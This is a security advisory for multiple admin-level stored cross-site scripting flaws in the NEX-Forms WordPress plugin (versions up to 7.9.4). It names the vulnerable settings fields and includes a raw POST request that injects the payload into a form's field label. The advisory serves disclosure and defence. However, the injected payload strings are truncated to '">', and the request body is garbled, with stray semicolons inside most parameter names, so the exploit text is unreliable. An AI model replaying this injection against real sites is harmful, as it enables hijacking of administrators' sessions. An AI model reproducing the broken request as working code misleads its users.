NEX-Forms <= 7.9.4 - Multiple Admin+ Stored Cross-Site Scripting

The plugin does not escape some of its settings and form fields before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

PoC

In Global Setting > Preferences > Validation, put the following payload in the Required Field, Incorrect Email, Incorrect URL or Alphabetical settings: "> In Global Setting > Preferences > Emails > Email Autoresponder (User emails) > Subject setting: "> The XSS will be triggered when viewing the NEX-Forms dashboard (/wp-admin/admin.php?page=nex-forms-dashboard) Create a new form, add a Name field and put the following payload as the Field Label Text: "> POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 6228 Connection: close Cookie: [admin+] action=nf_update_record&table;=wap_nex_forms&edit;_Id=2&plugin;=shared&title;=aa&form;_fields=&clean;_html=dummy&is;_form=1&is;_template=0&post;_type=POST&post;_action=ajax&custom;_url=&mail;_to=admin%40localhost.org&from;_address=admin%40localhost.org&from;_name=WP&on;_screen_confirmation_message=dummy&on;_screen_confirmation_message_admin=&google;_analytics_conversion_code=&confirmation;_page=&user;_email_field=&confirmation;_mail_subject=WP±+NEX-Forms+Submission&user;_confirmation_mail_subject=WP±+NEX-Forms+Submission%5C&confirmation;_mail_body=Thank+you+for+connecting+with+us.+We+will+respond+to+you+shortly.&on;_form_submission=message&form;_hidden_fields=&hidden;_fields=&conditional;_logic=&conditional;_logic_array=&admin;_email_body=%7B%7Bnf_form_data%7D%7D&bcc;=&bcc;_user_mail=&custom;_css=&form;_type=&draft;_Id=0&products;=&currency;_code=USD&email;_on_payment_success=&cmd;=_cart&lc;=US&mc;_field_map=&gr;_field_map=&mp;_field_map=&ms;_field_map=&email;_subscription=&attach;_pdf_to_email=&form;_to_post_map=&md;_theme%5B0%5D%5Btheme_name%5D=default&md;_theme%5B0%5D%5Btheme_shade%5D=light&md;_theme%5B0%5D%5Boverall_font%5D=&md;_theme%5B0%5D%5Bfield_spacing%5D=15&md;_theme%5B0%5D%5Boverall_label_font%5D=&md;_theme%5B0%5D%5Boverall_label_font_size%5D=13&md;_theme%5B0%5D%5Boverall_label_align%5D=left&md;_theme%5B0%5D%5Boverall_label_color%5D=%239e9e9e&md;_theme%5B0%5D%5Boverall_label_bold%5D=bold&md;_theme%5B0%5D%5Boverall_label_italic%5D=not-italic&md;_theme%5B0%5D%5Boverall_label_underline%5D=not-underline&md;_theme%5B0%5D%5Boverall_input_font%5D=&md;_theme%5B0%5D%5Boverall_input_font_size%5D=13&md;_theme%5B0%5D%5Boverall_input_align%5D=left&md;_theme%5B0%5D%5Boverall_input_color%5D=%239e9e9e&md;_theme%5B0%5D%5Boverall_input_bg_color%5D=white&md;_theme%5B0%5D%5Boverall_input_border_color%5D=%23dddddd&md;_theme%5B0%5D%5Boverall_input_bold%5D=0&md;_theme%5B0%5D%5Boverall_input_italic%5D=0&md;_theme%5B0%5D%5Boverall_input_underline%5D=0&md;_theme%5B0%5D%5Boverall_field_corners%5D=normal&md;_theme%5B0%5D%5Boverall_icon_font_size%5D=17&md;_theme%5B0%5D%5Boverall_icon_color%5D=%23888888&md;_theme%5B0%5D%5Boverall_icon_bg_color%5D=white&md;_theme%5B0%5D%5Boverall_icon_border_color%5D=%23dddddd&md;_theme%5B0%5D%5Boverall_field_errors%5D=modern&md;_theme%5B0%5D%5Boverall_field_errors_pos%5D=right&md;_theme%5B0%5D%5Bmsg_hide_form%5D=yes&md;_theme%5B0%5D%5Bmsg_position%5D=top&md;_theme%5B0%5D%5Bmsg_placement%5D=outside&md;_theme%5B0%5D%5Bloader_type%5D=ellipsis&md;_theme%5B0%5D%5Bloader_color%5D=%2340C4FF&form;_theme=bootstrap&jq;_theme=default&form;_style=background%3A+%23fff%3B+box-shadow%3A+rgba(0%2C+0%2C+0%2C+0.2)+0px+7px+16px+0px%3B+border-radius%3A+4px%3B+padding%3A+30px%3B+border-color%3A%23ddd%3B&msg;_style=background%3A+%23fff%3B+box-shadow%3A+rgba(0%2C+0%2C+0%2C+0.2)+0px+7px+16px+0px%3B+border-radius%3A+4px%3B+padding%3A+30px%3B+border-color%3A%23ddd%3B&multistep;_settings%5B0%5D%5Bmulti_step_total%5D=0&multistep;_settings%5B0%5D%5Bmulti_step_stepping%5D=&multistep;_settings%5B0%5D%5Bmulti_step_transition_in%5D=fadeIn&multistep;_settings%5B0%5D%5Bmulti_step_transition_out%5D=fadeOut&multistep;_settings%5B0%5D%5Bmulti_step_back_disabled%5D=no&multistep;_settings%5B0%5D%5Bbreadcrumb_list%5D=%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09&multistep;_settings%5B0%5D%5Bbreadcrumb_type%5D=pilled&multistep;_settings%5B0%5D%5Btext_pos%5D=text-bottom&multistep;_settings%5B0%5D%5Bcrumb_align%5D=align_left&multistep;_settings%5B0%5D%5Bbc_position%5D=top&multistep;_settings%5B0%5D%5Bdata_theme%5D=default&multistep;_settings%5B0%5D%5Bshow_front_end%5D=yes&multistep;_settings%5B0%5D%5Bshow_inside%5D=no&multistep;_settings%5B0%5D%5Bscroll_to_top%5D=yes&multistep;_settings%5B0%5D%5Bform_width_pixels%5D=950&multistep;_settings%5B0%5D%5Bform_width_percentage%5D=100&multistep;_settings%5B0%5D%5Bform_width_unit%5D=%25&multistep;_settings%5B0%5D%5Bmsg_width_pixels%5D=950&multistep;_settings%5B0%5D%5Bmsg_width_percentage%5D=100&multistep;_settings%5B0%5D%5Bmsg_width_unit%5D=%25&multistep;_settings%5B0%5D%5Bbc_gutter%5D=20&multistep;_settings%5B0%5D%5Bbc_folded%5D=bc-unfolded&multistep;_settings%5B0%5D%5Bbc_connected%5D=bc-connected&multistep;_settings%5B0%5D%5Bbc_style%5D=bc-solid&multistep;_settings%5B0%5D%5Bbc_css%5D=&multistep;_settings%5B0%5D%5Bbc_converted%5D=1&multistep;_settings%5B0%5D%5Badd_timer%5D=no&multistep;_settings%5B0%5D%5Btimer_add_to%5D=header&multistep;_settings%5B0%5D%5Btimer_type%5D=overall&multistep;_settings%5B0%5D%5Benabled_units%5D=minutes%2Cseconds&multistep;_settings%5B0%5D%5Btimer_size%5D=small&multistep;_settings%5B0%5D%5Btimer_position%5D=timer_inline&multistep;_settings%5B0%5D%5Btimer_align%5D=timer_right&multistep;_settings%5B0%5D%5Btimer_animation%5D=smooth&multistep;_settings%5B0%5D%5Btimer_hours%5D=0&multistep;_settings%5B0%5D%5Btimer_minutes%5D=0&multistep;_settings%5B0%5D%5Btimer_seconds%5D=30&multistep;_settings%5B0%5D%5Btimer_hours_label%5D=&multistep;_settings%5B0%5D%5Btimer_minutes_label%5D=&multistep;_settings%5B0%5D%5Btimer_seconds_label%5D=&multistep;_settings%5B0%5D%5Btimer_hours_color%5D=%232979ff&multistep;_settings%5B0%5D%5Btimer_minutes_color%5D=%2300bcd4&multistep;_settings%5B0%5D%5Btimer_seconds_color%5D=%2340c4ff&multistep;_settings%5B0%5D%5Btimer_direction%5D=clockwise&multistep;_settings%5B0%5D%5Btimer_wrapper_css%5D=&multistep;_settings%5B0%5D%5Btimer_text_color%5D=%23888888&multistep;_settings%5B0%5D%5Btimer_inner_circle_color%5D=%23aaaaaa&multistep;_settings%5B0%5D%5Btimer_bg_width%5D=0.1&multistep;_settings%5B0%5D%5Btimer_fg_width%5D=0.05&multistep;_settings%5B0%5D%5Btimer_start%5D=1&multistep;_settings%5B0%5D%5Btimer_end%5D=0&multistep;_html=dummy&upload;_settings%5B0%5D%5Bupload_to_server%5D=true&attachment;_settings%5B0%5D%5Battach_to_admin_email%5D=true&option;_settings%5B0%5D%5Bsave_form_progress%5D=false&option;_settings%5B0%5D%5Bsubmit_limit%5D=&option;_settings%5B0%5D%5Bsubmit_limit_msg%5D=&option;_settings%5B0%5D%5Bsend_admin_email%5D=true&option;_settings%5B0%5D%5Bbefore_submit_js%5D=return+true%3B&option;_settings%5B0%5D%5Bafter_submit_js%5D=return+true%3B